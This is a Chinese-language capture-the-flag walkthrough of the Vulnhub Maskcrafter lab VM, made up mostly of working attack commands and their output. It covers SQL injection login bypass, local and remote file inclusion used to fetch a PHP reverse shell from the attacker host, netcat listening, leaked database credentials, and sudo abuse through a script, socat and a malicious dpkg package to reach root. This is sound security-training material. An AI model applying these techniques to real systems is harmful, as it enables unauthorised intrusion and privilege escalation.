Vulnhub之Maskcrafter靶机详细测试过程

Maskcrafter

识别目标主机IP地址

─(kali㉿kali)-[~/Vulnhub/Maskcrafter]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                        
                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:06      1      60  Unknown vendor                                                           
 192.168.56.100  08:00:27:4c:3f:93      1      60  PCS Systemtechnik GmbH                                                   
 192.168.56.254  08:00:27:1c:48:cc      1      60  PCS Systemtechnik GmbH  

利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.254

NMAP扫描

┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-09 19:59 EDT
Nmap scan report for www.armour.local (192.168.56.254)
Host is up (0.000073s latency).
Not shown: 65526 closed tcp ports (reset)
PORT      STATE SERVICE  VERSION
21/tcp    open  ftp      vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x    2 112      115          4096 Mar 30  2020 pub
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 192.168.56.206
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp    open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8f1b43230a248c66ad3da2b969334dd7 (RSA)
|   256 8a2c857c2d9622f698f24ab67a88df23 (ECDSA)
|_  256 aca799159cbf6944d9c2962a8f799b6d (ED25519)
80/tcp    open  http     Apache httpd 2.4.29 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/debug
| http-title: Maskcrafter(TM) Login Page
|_Requested resource was login.php
|_http-server-header: Apache/2.4.29 (Ubuntu)
111/tcp   open  rpcbind  2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      35771/tcp6  mountd
|   100005  1,2,3      35951/udp   mountd
|   100005  1,2,3      47498/udp6  mountd
|   100005  1,2,3      50685/tcp   mountd
|   100021  1,3,4      45195/tcp6  nlockmgr
|   100021  1,3,4      46199/tcp   nlockmgr
|   100021  1,3,4      48207/udp6  nlockmgr
|   100021  1,3,4      53602/udp   nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
2049/tcp  open  nfs_acl  3 (RPC #100227)
38041/tcp open  mountd   1-3 (RPC #100005)
45351/tcp open  mountd   1-3 (RPC #100005)
46199/tcp open  nlockmgr 1-4 (RPC #100021)
50685/tcp open  mountd   1-3 (RPC #100005)
MAC Address: 08:00:27:1C:48:CC (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.48 seconds

获得Shell

┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
└─$ ftp 192.168.56.254               
Connected to 192.168.56.254.
220 Welcome to maskcrafter(TM) FTP service.
Name (192.168.56.254:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||28847|)
150 Here comes the directory listing.
drwxr-xr-x    3 0        115          4096 Mar 21  2020 .
drwxr-xr-x    3 0        115          4096 Mar 21  2020 ..
drwxr-xr-x    2 112      115          4096 Mar 30  2020 pub
226 Directory send OK.
ftp> cd pub
250 Directory successfully changed.
ftp> ls -alh
229 Entering Extended Passive Mode (|||63424|)
150 Here comes the directory listing.
drwxr-xr-x    2 112      115          4096 Mar 30  2020 .
drwxr-xr-x    3 0        115          4096 Mar 21  2020 ..
-rw-r--r--    1 0        0             430 Mar 30  2020 NOTES.txt
-rw-r--r--    1 0        0             229 Mar 23  2020 cred.zip
226 Directory send OK.
ftp> get NOTES.txt
local: NOTES.txt remote: NOTES.txt
229 Entering Extended Passive Mode (|||15955|)
150 Opening BINARY mode data connection for NOTES.txt (430 bytes).
100% |********************************************************************************|   430      273.03 KiB/s    00:00 ETA
226 Transfer complete.
430 bytes received in 00:00 (224.31 KiB/s)
ftp> get cred.zip
local: cred.zip remote: cred.zip
229 Entering Extended Passive Mode (|||30982|)
150 Opening BINARY mode data connection for cred.zip (229 bytes).
100% |********************************************************************************|   229      427.59 KiB/s    00:00 ETA
226 Transfer complete.
229 bytes received in 00:00 (197.90 KiB/s)
ftp> quit
221 Goodbye.
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
└─$ cat NOTES.txt     
Dear Web Administrator,

I've got a few points to make:

1.) Please choose a stronger password for /debug web-directory.
Having a username as 'admin' is already guessable but selecting a dictionary password is a big NO-NO.

2.) Please revisit the SQL code to prevent SQL injections because the way it is now, it is absolutely terrible.
Basically, we are hoping and praying that no hacker ever finds out about this.

Regards,
Root
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
└─$ ls -alh
total 20K
drwxr-xr-x  2 kali kali 4.0K Apr  9 20:00 .
drwxr-xr-x 83 kali kali 4.0K Apr  9 19:54 ..
-rw-r--r--  1 kali kali  229 Mar 23  2020 cred.zip
-rw-r--r--  1 root root 2.7K Apr  9 19:59 nmap_full_scan
-rw-r--r--  1 kali kali  430 Mar 29  2020 NOTES.txt
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
└─$ unzip cred.zip       
Archive:  cred.zip
[cred.zip] cred.txt password:                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
└─$ zip2john cred.zip > hashes
ver 1.0 efh 5455 efh 7875 cred.zip/cred.txt PKZIP Encr: 2b chk, TS_chk, cmplen=47, decmplen=35, crc=5D29BC84 ts=63CD cs=63cd type=0
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hashes
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:01 DONE (2023-04-09 20:00) 0g/s 9562Kp/s 95

john没有破解出credit.zip密码,而且作者有提示,不需要使用破解方法。

┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
└─$ showmount -e 192.168.56.254                                
Export list for 192.168.56.254:

目标主机没有NFS共享目录。

Kali Linux访问80端口,为用户登录界面,用admin' or 1=1 -- 即可轻松绕过。

登录成功后,在页面源代码中有注释:

<i>This webpage was created out of urgency and as such some features are still buggy and may not work as intended.</i><br><pre>DB connection ok.</pre><hr>Development in progress, please report any bugs to admin@covid19.localhost<pre>Due to the increase demand for our product, you are to ramp up your productivity by 200%, else suffer a pay cut!</pre>
<html>
<head><title>Employee page</title></head>
<body>
	<h3>Welcome admin' or 1=1 -- !</h3>	

	<!-- <p><a href="?page=warning.php">Director's message</a></p> -->
	<a href="logout.php">Logout</a>
</body>
</html>

访问注释中的链接。

访问下面的URL,返回的页面没有变化,但是注释参数page,可能存在本地文件包含漏洞

http://192.168.56.254/index.php?page=warning.php
http://192.168.56.254/index.php?page=../../../../../etc/passwd

访问上述URL得到:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
userx:x:1000:1000:userx:/home/userx:/bin/bash
mysql:x:111:113:MySQL Server,,,:/nonexistent:/bin/false
researcherx:x:1001:1001:,,,:/home/researcherx:/bin/bash
ftp:x:112:115:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
statd:x:113:65534::/var/lib/nfs:/usr/sbin/nologin
evdaez:x:1002:1002:,,,:/home/evdaez:/bin/bash

接着测试一下是否存在远程文件包含漏洞:

在Kali Linux启动http

http://192.168.56.254/index.php?page=http://192.168.56.206:8000/test.txt

得到返回:

jason,great

说明目标主机存在远程文件包含漏洞。

接下来在Kali Linux准备好php reverse文件,然后访问该文件从而得到shell

http://192.168.56.254/index.php?page=http://192.168.56.206:8000/shell.php
┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
└─$ sudo nc -nlvp 5555                         
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.254] 39276
Linux maskcrafter 4.15.0-91-generic #92-Ubuntu SMP Fri Feb 28 11:09:48 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 08:15:22 up 17 min,  0 users,  load average: 0.00, 0.00, 0.02
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@maskcrafter:/$ 

提权

www-data@maskcrafter:/var/www/html$ cat db.php
cat db.php
<?php

$connection = mysqli_connect("localhost", "web", "P@ssw0rdweb", "mydatabase");

if (!$connection)
{
        die("<h4>Connection failed -> " . mysqli_connect_error() . "</h4>");
}

echo "<i>This webpage was created out of urgency and as such some features are still buggy and may not work as intended.</i><br>";

echo "<pre>";
echo "DB connection ok.";
echo "</pre>";
echo "<hr>";


得到了数据库连接的用户名和密码

www-data@maskcrafter:/home$ mysql -uweb -p 
mysql -uweb -p 
Enter password: P@ssw0rdweb

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 59
Server version: 5.7.29-0ubuntu0.18.04.1 (Ubuntu)

Copyright (c) 2000, 2020, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mydatabase         |
| mysql              |
| performance_schema |
| phpmyadmin         |
| sys                |
+--------------------+
6 rows in set (0.01 sec)

mysql> use mydatabase;
use mydatabase;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
show tables;
+----------------------+
| Tables_in_mydatabase |
+----------------------+
| creds                |
| login                |
+----------------------+
2 rows in set (0.00 sec)

mysql> select * from creds;
select * from creds;
+----+--------------+-------------+
| id | data_type    | password    |
+----+--------------+-------------+
|  1 | zip password | cred12345!! |
+----+--------------+-------------+
1 row in set (0.00 sec)

mysql> 

这应该是creds.zip的密码

┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
└─$ unzip cred.zip
Archive:  cred.zip
[cred.zip] cred.txt password: 
 extracting: cred.txt                
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
└─$ cat cred.txt 
userx:thisismypasswordforuserx2020

得到了userx的密码,切换shell到该用户。

userx@maskcrafter:~$ sudo -l
sudo -l
Matching Defaults entries for userx on maskcrafter:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User userx may run the following commands on maskcrafter:
    (evdaez) NOPASSWD: /scripts/whatsmyid.sh
userx@maskcrafter:~$ ls -alh /scripts/whatsmyid.sh
ls -alh /scripts/whatsmyid.sh
-rwxr-xr-x 1 userx userx 15 Mar 30  2020 /scripts/whatsmyid.sh
userx@maskcrafter:~$ cat /scripts/whatsmyid.sh
cat /scripts/whatsmyid.sh
#!/bin/bash
id
userx@maskcrafter:~$ echo '/bin/bash' >> /scripts/whatsmyid.sh
echo '/bin/bash' >> /scripts/whatsmyid.sh

userx@maskcrafter:~$ sudo -u evdaez /scripts/whatsmyid.sh
sudo -u evdaez /scripts/whatsmyid.sh
uid=1002(evdaez) gid=1002(evdaez) groups=1002(evdaez)
bash: /home/userx/.bashrc: Permission denied
evdaez@maskcrafter:~$ id
id
uid=1002(evdaez) gid=1002(evdaez) groups=1002(evdaez)

成功切换到了用户evdaez

evdaez@maskcrafter:/home/evdaez$ sudo -l
sudo -l
Matching Defaults entries for evdaez on maskcrafter:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User evdaez may run the following commands on maskcrafter:
    (researcherx) NOPASSWD: /usr/bin/socat
evdaez@maskcrafter:/home/evdaez$ sudo -u researcherx /usr/bin/socat stdin exec:/bin/sh
<do -u researcherx /usr/bin/socat stdin exec:/bin/sh
id
id
uid=1001(researcherx) gid=1001(researcherx) groups=1001(researcherx),4(adm),24(cdrom),30(dip),46(plugdev),108(lxd)

利用socat成功切换到了用户researcherx

cd /tmp
TF=$(mktemp -d)
echo 'exec /bin/sh' > $TF/x.sh
fpm -n x -s dir -t deb -a all --before-install $TF/x.sh $TF
Doing `require 'backports'` is deprecated and will not load any backport in the next major release.
Require just the needed backports instead, or 'backports/latest'.
{:timestamp=>"2023-04-10T08:42:18.755150+0000", :message=>"Debian packaging tools generally labels all files in /etc as config files, as mandated by policy, so fpm defaults to this behavior for deb packages. You can disable this default behavior with --deb-no-default-config-files flag", :level=>:warn}
{:timestamp=>"2023-04-10T08:42:18.786663+0000", :message=>"Created package", :path=>"x_1.0_all.deb"}
sudo /usr/bin/dpkg -i x_1.0_all.deb             
(Reading database ... 96141 files and directories currently installed.)
Preparing to unpack x_1.0_all.deb ...
id
uid=0(root) gid=0(root) groups=0(root)
cd /root
ls -alh
total 88K
drwx------  9 root root 4.0K Mar 30  2020 .
drwxr-xr-x 28 root root 4.0K Mar 30  2020 ..
-rw-r--r--  1 root root   39 Mar 20  2020 .bash_aliases
lrwxrwxrwx  1 root root    9 Mar 20  2020 .bash_history -> /dev/null
-rw-r--r--  1 root root 3.1K Mar 20  2020 .bashrc
drwx------  2 root root 4.0K Mar 21  2020 .cache
-rw-r--r--  1 root root   22 Mar 20  2020 .gdbinit
drwxr-xr-x  3 root root 4.0K Mar 20  2020 .gem
drwx------  3 root root 4.0K Mar 21  2020 .gnupg
-rw-------  1 root root   38 Mar 20  2020 .lesshst
drwxr-xr-x  3 root root 4.0K Mar 20  2020 .local
drwxr-xr-x  4 root root 4.0K Mar 20  2020 peda
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root   75 Mar 23  2020 root.txt
-rw-r--r--  1 root root   75 Mar 20  2020 .selected_editor
drwx------  2 root root 4.0K Mar 20  2020 .ssh
drwxr-xr-x  2 root root 4.0K Mar 21  2020 .vim
-rw-------  1 root root  20K Mar 30  2020 .viminfo
-rw-r--r--  1 root root  215 Mar 21  2020 .wget-hsts
cat root.txt
Congrats on finishing this VM...

Please tweet me your walkthrough @evdaez

至此得到root shell以及root flag.

热门相关:最强狂兵   寂静王冠   霸皇纪   仗剑高歌   寂静王冠